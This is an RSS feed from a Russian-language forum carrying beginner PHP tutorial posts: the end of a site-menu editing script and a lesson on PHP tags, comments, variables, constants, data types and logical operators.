/&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $tmphtmlmeta =&amp;#160; HTMLMETAPAGES.&amp;quot;$cfl&amp;quot;.&amp;quot;_meta.html&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $tmpphp =&amp;#160; PHPPAGES.&amp;quot;$cfl.php&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // удаление файлов данных и страниц&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if(@file_exists($cont5)){&amp;#160; unlink($cont5); }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if(@file_exists($tmphtml)){&amp;#160; unlink($tmphtml); }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if(@file_exists($tmphtmlmeta)){&amp;#160; unlink($tmphtmlmeta); }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if(@file_exists($tmpphp)){&amp;#160; unlink($tmpphp); }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if($design == &#039;изменить&#039;)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; @fwrite ($fp,&amp;quot;$cont2::$cont3::$cont4::$cont5::\n&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // пересоздать файл .html страницы раздела&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; touch(&amp;quot;$tmphtml&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // пересоздать файл .html мета описания страницы раздела&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; touch(&amp;quot;$tmphtmlmeta&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // пересоздать файл .php страницы раздела&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; touch(&amp;quot;$tmpphp&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // пересоздать файл для разделов редактируемой рубрики&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; touch(&amp;quot;$cont5&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; else{@fwrite ($fp,$general[$i]);}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&amp;#160; &lt;br /&gt;&amp;#160; &amp;#160; @fclose ($fp); &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &lt;br /&gt;//----------------------------------------------------------------------------&lt;/p&gt;
						&lt;p&gt;?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Для того, чтобы проследить все действия выполняемые в скрипте добавления и редактирования разделов меню сайта на практике, нужно заменить предыдущий скрипт проекта на новый, выполнив не только полную синхронизацию, но и команду put, которая описана на этой странице данного раздела. Далее необходимо запустить локальный сервер, набрать в браузере mysitephp.ru, войти в админпалель (логин -login, пароль - pass) и проверить в работе проект со скриптом добавления и редактирования рубрик и разделов на борту. Кроме всего прочего обновленный проект имеет некоторые изменения в основных php файлах, касающиеся его корректной работы на php5, которые можно проследить в комментариях, сравнив с предыдущим. В частности обновлен скрипт популярности страниц, который теперь может показывать популярные посещенные страницы не в пооизвольном порядке, а в порядке снижения их популярности. В дальнейшем планируется сделать последний штрих в этом php скрипте - управление из .ini файла количеством отображаемых страниц популярности за определенный период времени.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 22:13:18 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>программы php</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Программы PHP могут выполняться двумя способами: как сценарное приложение Web-сервером и как консольные программы. Поскольку, нашей задачей является программирование web-приложений, мы преимущественно будем рассматривать первый способ.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Дело в том, что PHP, как правило, используется сугубо для программирования приложений, связанных с Интернетом. Однако, PHP можно еще использовать в качестве интерпретатора командной строки, в основном в *nix-системах. Последнее возможно при помощи CORBA и COM интерфейсов, а также при помощи расширения PHP-GTK. При таком использовании PHP возможно решение следующих задач:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; * создание приложений интерактивной командной строки;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; * создание кросс-платформенных GUI приложений при помощи библиотеки PHP-GTK;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; * автоматизация некоторых задач под Windows и Linux&lt;/p&gt;
						&lt;p&gt;Рассмотрим процесс выполнения php-сценария при обращении броузера к серверу. Итак, вначале броузер запрашивает страницу с расширением .php, после чего web-сервер пропускает программу через машину PHP и выдаёт результат в виде html-кода. Причем, если взять стандартную страницу HTML, изменить расширение на .php и пропустить её через машину PHP, последняя просто перешлёт её пользователю без изменений. Чтобы включить в этот файл команды PHP, необходимо заключить команды PHP в специальные теги, которых различают 4 вида (они эквивалентны и можно использовать любые):&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;1. Инструкция обработки XML:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ...&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;2. Инструкция обработки SGML:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ...&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;3. Инструкция обработки сценариев HTML:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;lt;script language = &amp;quot;php&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ...&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;4. Инструкция в стиле ASP:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;lt;%&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ...&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; %&amp;gt;&lt;/p&gt;
						&lt;p&gt;Мы будем придерживаться стиля XML или SGML.&lt;/p&gt;
						&lt;p&gt;Вообще говоря, внутри какого-либо блока кода можно выйти из PHP, при условии, что дальше мы войдем в него снова и закончим код (Подробнее об этом смотрите в гл.2.). Т.е., возможна следующая конструкция:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if(5&amp;lt;3){&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;Hello, world!&amp;lt;p&amp;gt;&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;&amp;lt;p&amp;gt;Hello!&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;// эта строка не интерпретируется как код PHP&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;// и выводится только если&amp;#160; блок кода выполняется&lt;br /&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo(&amp;quot;&amp;lt;p&amp;gt;Hello, world!&amp;lt;p&amp;gt;&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Команда echo в PHP применяется для вывода фактически всего, что встречается на web-страницах (текст, разметку HTML, числа). Смысл ее действия, мы думаем, понятен из приведенного примера. &lt;br /&gt;PHP предоставляет несколько методов для вставки комментариев. Проще всего пользоваться двойным слэшем в стиле языка С++ (//), после чего PHP машина игнорирует все, что расположено до конца строки. Также можно пользоваться многострочными комментариями в стиле С (/*…*/). Для однострочных комментариев можно еще пользоваться символом решетки (#) (комментарий скриптовых языков UNIX).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;quot;); // комментарий&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;quot;); # комментарий&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;/* &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; и это тоже комментарии&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;*/&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Следует помнить о том, что стили комментариев PHP действуют только внутри ограничителей PHP. Если PHP встретит эти символы комментариев вне ограничителей, то они, как и любой текст, будут помещены на html-страницу. Например:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;&amp;quot;); // нормальный комментарий&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; // а вот этот комментарий отобразиться броузером.&lt;br /&gt;&amp;#160; &amp;#160; &amp;lt;!-- Комментарий&amp;#160; HTML. &lt;br /&gt;&amp;#160; &amp;#160; Будет виден в исходном коде HTML, но не в браузере&amp;#160; --&amp;gt; &lt;/p&gt;
						&lt;p&gt;Заметим, что комментарии можно вставлять не только после конца оператора, а, например, и вот так:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$a = &amp;quot;Hello, world&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo strstr($a,&amp;quot;H&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;// эту функцию мы рассмотрим позднее&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;В РНР переменные начинаются со знака доллара ($), за которым может следовать любое количество буквенно-цифровых символов и символов подчеркивания, но первый символ не может быть цифрой. Таким образом, допустимы следующие имена переменных: $n, $n1, $user_func_5 и т. д. В отличие от ключевых слов, имена пе-ременных в PHP чувствительны к регистру, т. е. переменные $user, $User и $USER являются различными.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; $user = &amp;quot;Владимир&amp;quot;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; $User = &amp;quot;Дмитрий&amp;quot;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; $USER = &amp;quot;Юрий&amp;quot;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; echo $user; // Владимир&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; echo $User; // Дмитрий&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; echo $USER; // Юрий&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;При объявлении переменных в РНР не требуется явно указывать тип переменной, при этом одна и та же переменная может иметь на протяжении программы разные типы.&lt;/p&gt;
						&lt;p&gt;Как видно из предыдущего листинга, для присвоения значения переменной необходимо воспользоваться оператором присвоения =, который позволяет инициализировать переменную. При объявлении числовых значений в качестве разделителя целого значения и дробной части выступает точка.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; $number = 1;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; $var = 3.14;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Внешние переменные&lt;/p&gt;
						&lt;p&gt;После того, как запрос клиента проанализирован веб-сервером и передан РНР машине, последняя устанавливает ряд переменных, которые содержат данные, относящиеся к запросу и доступны все время его выполнения. Сначала РНР извлекает переменные окружения операционной системы и создает переменные с теми же именами и значениями в окружении сценария РНР для того чтобы сценариям, расположенным на сервере были доступны особенности системы клиента. Эти переменные помещаются в ассоциативный массив $_SERVER (содержимое этого массива можно всегда посмотреть, воспользовавшись функцией print_r($_SERVER) или phpinfo()).&lt;/p&gt;
						&lt;p&gt;Затем РНР создает группу GET-переменных, которые создаются при анализе строки запроса. Строка запроса хранится в переменной $_SERVER[&#039;QUERY_STRING&#039;] и представляет собой информацию, следующую за символом &amp;quot;?&amp;quot; в запрошенном URL. РНР разбивает строку запроса по символам &amp;amp; на отдельные элементы, а затем ищет в каждом из этих элементов знак &amp;quot;=&amp;quot;. Если знак &amp;quot;=&amp;quot; найден, то создается переменная с именем из символов, стоящих слева от знака равенства. Рассмотрим следующую форму:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;form action = &amp;quot;http://localhost/PHP/test.php&amp;quot; method=&amp;quot;get&amp;quot;&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; HDD: &amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;HDD&amp;quot;/&amp;gt;&amp;lt;br&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; CDROM: &amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;CDROM&amp;quot;/&amp;gt;&amp;lt;br&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;input type=&amp;quot;submit&amp;quot;/&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;/form&amp;gt;&lt;/p&gt;
						&lt;p&gt;Если Вы в этой форме в строке HDD наберете, к примеру, &amp;quot;Maxtor&amp;quot;, а в строке CDROM &amp;quot;Nec&amp;quot;, то она сгенерирует следующую форму запроса:&lt;br /&gt;http://localhost/PHP/test.php?HDD=Maxtor&amp;amp;CDROM=Nec&lt;/p&gt;
						&lt;p&gt;В нашем случае РНР создаст следующие переменные: $_GET[&#039;HDD&#039;] = &amp;quot;Maxtor&amp;quot; и $_GET[&#039;CDROM&#039;] = &amp;quot;Nec&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Вы можете работать с этими переменными из Вашего скрипта (у нас – test.php) как с обычными переменными. В нашем случае они просто выводятся на экран:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;HDD is $_GET[HDD]&amp;lt;/p&amp;gt;&amp;quot;);&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(&amp;quot;&amp;lt;p&amp;gt;CDROM is $_GET[CDROM]&amp;lt;/p&amp;gt;&amp;quot;);&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Если запрос страницы выполняется при помощи метода POST, то появляется группа POST-переменных, которые интерпретируются также и помещаются в массив $_POST. &lt;br /&gt;Константы объявляются в РНР при помощи функции define():&lt;/p&gt;
						&lt;p&gt;define(CONSTANT, value)&lt;/p&gt;
						&lt;p&gt;Первый параметр этой функции – имя константы, второй – её значение. При использовании константы на неё ссылаются по имени:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;define(CONSTANT1,15);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;define(CONSTANT2,&amp;quot;\x20&amp;quot;); // код пробела&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;define(CONSTANT3,&amp;quot;Hello&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(CONSTANT1);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(CONSTANT2);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(CONSTANT3);&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;По традиции имена констант пишут буквами верхнего регистра. И хотя это только традиция, мы Вам рекомендуем ей следовать, поскольку плохие программисты получаются в том числе и из тех, кто не следовал хорошим традициям J. Существует функция defined(), которая проверяет, определена ли константа:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;define(CONSTANT,&amp;quot;Hello&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if(defined(&amp;quot;CONSTANT&amp;quot;))&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo(&amp;quot;&amp;lt;p&amp;gt;CONSTANT is defined&amp;lt;/p&amp;gt;&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &lt;strong&gt;&lt;/strong&gt;типы данных в php&lt;br /&gt;Как уже было сказано, PHP предоставляет определенную гибкость в отношении типов переменных, т.е. с одной и той же переменной на протяжении программы можно работать и как со строкой, и как с числом. Однако, несмотря на это в РНР существуют набор основных типов данных, которые могут явно указываться при работе с переменными:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * integer;&lt;br /&gt;&amp;#160; &amp;#160; * string;&lt;br /&gt;&amp;#160; &amp;#160; * boolean;&lt;br /&gt;&amp;#160; &amp;#160; * double;&lt;br /&gt;&amp;#160; &amp;#160; * array;&lt;br /&gt;&amp;#160; &amp;#160; * object;&lt;/p&gt;
						&lt;p&gt;Есть функция gettype(), возвращающая тип, который РНР назначил переменной:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$var = &amp;quot;5&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$var1 = 5;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(gettype($var));&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo &amp;quot;&amp;lt;br&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(gettype($var1));&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;В первом случае РНР вернет string, во втором integer.&lt;/p&gt;
						&lt;p&gt;Существует также функция settype(), которая явно устанавливает тип:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$var = &amp;quot;5&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(gettype($var));&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;settype($var,integer);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo &amp;quot;&amp;lt;br&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(gettype($var));&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Выполнение этого фрагмента кода приведет к такому же результату, как и предыдущего.&lt;/p&gt;
						&lt;p&gt;Кроме функции settype() преобразование типов в РНР можно осуществлять при помощи операторов преобразования типов. Преобразование типов осуществляется путем указания перед переменной ее нового типа, взятого в скобки:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; $var = (int)$var; &lt;/p&gt;
						&lt;p&gt;Соответственно, выполнение следующего кода приведет к тому, что РНР вернет integer:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$var = &amp;quot;5&amp;quot;; // тип string&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$var = (int)$var; // преобразуем в int&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;echo(gettype($var));&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Операторы этой группы, в отличие от поразрядных, работают с логическими переменными (boolean) и интенсивно используются в управляющих конструкциях: циклы и условия. Логические переменные, или более правильно, переменные типа Boolean имеют лишь два значения: true(истина) и false(ложь). В выражениях true и false можно заменить на 1(любое отличное от 0 число) и 0, соответственно. Возможность замены true и false на 1 и 0 – это «наследство» языка С, в котором не было специальных переменных true и false.&lt;/p&gt;
						&lt;p&gt;Логически операторы для переменных типа Boolean выполняют роль операторов сложения, вычитания для обычных переменных. Рассмотрим несколько примеров, если их смысл Вам не очень понятен – не расстраивайтесь, просто вернитесь сюда, прочитав главу 2. Оператор if(cond) проверяет условие cond, если его значение true – выполняется код в фигурных скобках, следующий за if, если false – код после оператора else. Если cond равен false – всё наоборот.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag = true; // Истина&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if($flag)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Переменная flag имеет значение true&amp;lt;/p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;} else {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Переменная flag имеет значение false&amp;lt;/p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Результаты работы скрипта выглядят следующим образом:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Переменная flag имеет значение true&lt;/p&gt;
						&lt;p&gt;Если теперь заменить строчку&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; $flag = true; // Истина&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; на&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; $flag = false; // Ложь&lt;/p&gt;
						&lt;p&gt;Результат, выдаваемый тэгом измениться:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Переменная flag имеет значение false&lt;/p&gt;
						&lt;p&gt;Т.е. мы зашли в блок else, так как в операторе if условие ложно.&lt;/p&gt;
						&lt;p&gt;Когда условие одно, как видите, всё просто. Когда условий больше - в дело вступают логические операторы:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag1 = true; // Истина&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag2 = true; // Истина&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if($flag1 &amp;amp;&amp;amp; $flag2) // И $flag1 И $flag2 истины&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие: true (Оба флага истины)&amp;lt;/p&amp;gt;&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // Да&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;} else {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие: false (Один из флагов ложен)&amp;lt;/p&amp;gt;&amp;quot;; &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // Нет, один или оба ложны&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Этот скрипт выведет: Условие: true (Оба флага истины). Если хотя бы один из операторов окажется равным false (или оба сразу) – будет выведено: Условие: false (Один из флагов ложен).&lt;/p&gt;
						&lt;p&gt;Обязательно попробуйте поиграть с условиями: если вы не будете разбираться в условных операторах – Вы никогда не будете хорошим программистом ни на одном языке программирования. Если Вы считаете, что Вам не нужны условные операторы – Вам не нужен язык программирования.&lt;/p&gt;
						&lt;p&gt;Заменим &amp;amp;&amp;amp; (И) на || (ИЛИ)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;?php&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag1 = true; // Истина&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;$flag2 = false; // Ложь&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;if($flag1 || $flag2) &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // Хоть кто-то из двух флагов($flag1 $flag2) истинен&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;{&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие: true (Один из флагов истин)&amp;lt;/p&amp;gt;&amp;quot;; &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // Да&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;} else {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; echo &amp;quot;&amp;lt;p&amp;gt;Условие: false (Оба флага ложны)&amp;lt;/p&amp;gt;&amp;quot;; &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; // Нет оба имеют значение false&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; ?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Опять получаем: Условие: true.&lt;/p&gt;
						&lt;p&gt;Для И и ИЛИ, как видим, возможны два варианта операторов, причем эти операторы с разными приоритетами. Приоритетность выполнения логических операторов: or &amp;gt; xor &amp;gt; and &amp;gt; || &amp;gt; &amp;amp;&amp;amp; &amp;gt; ! Иногда в условиях удобно использовать скобки для явного задания приоретета:&lt;/p&gt;
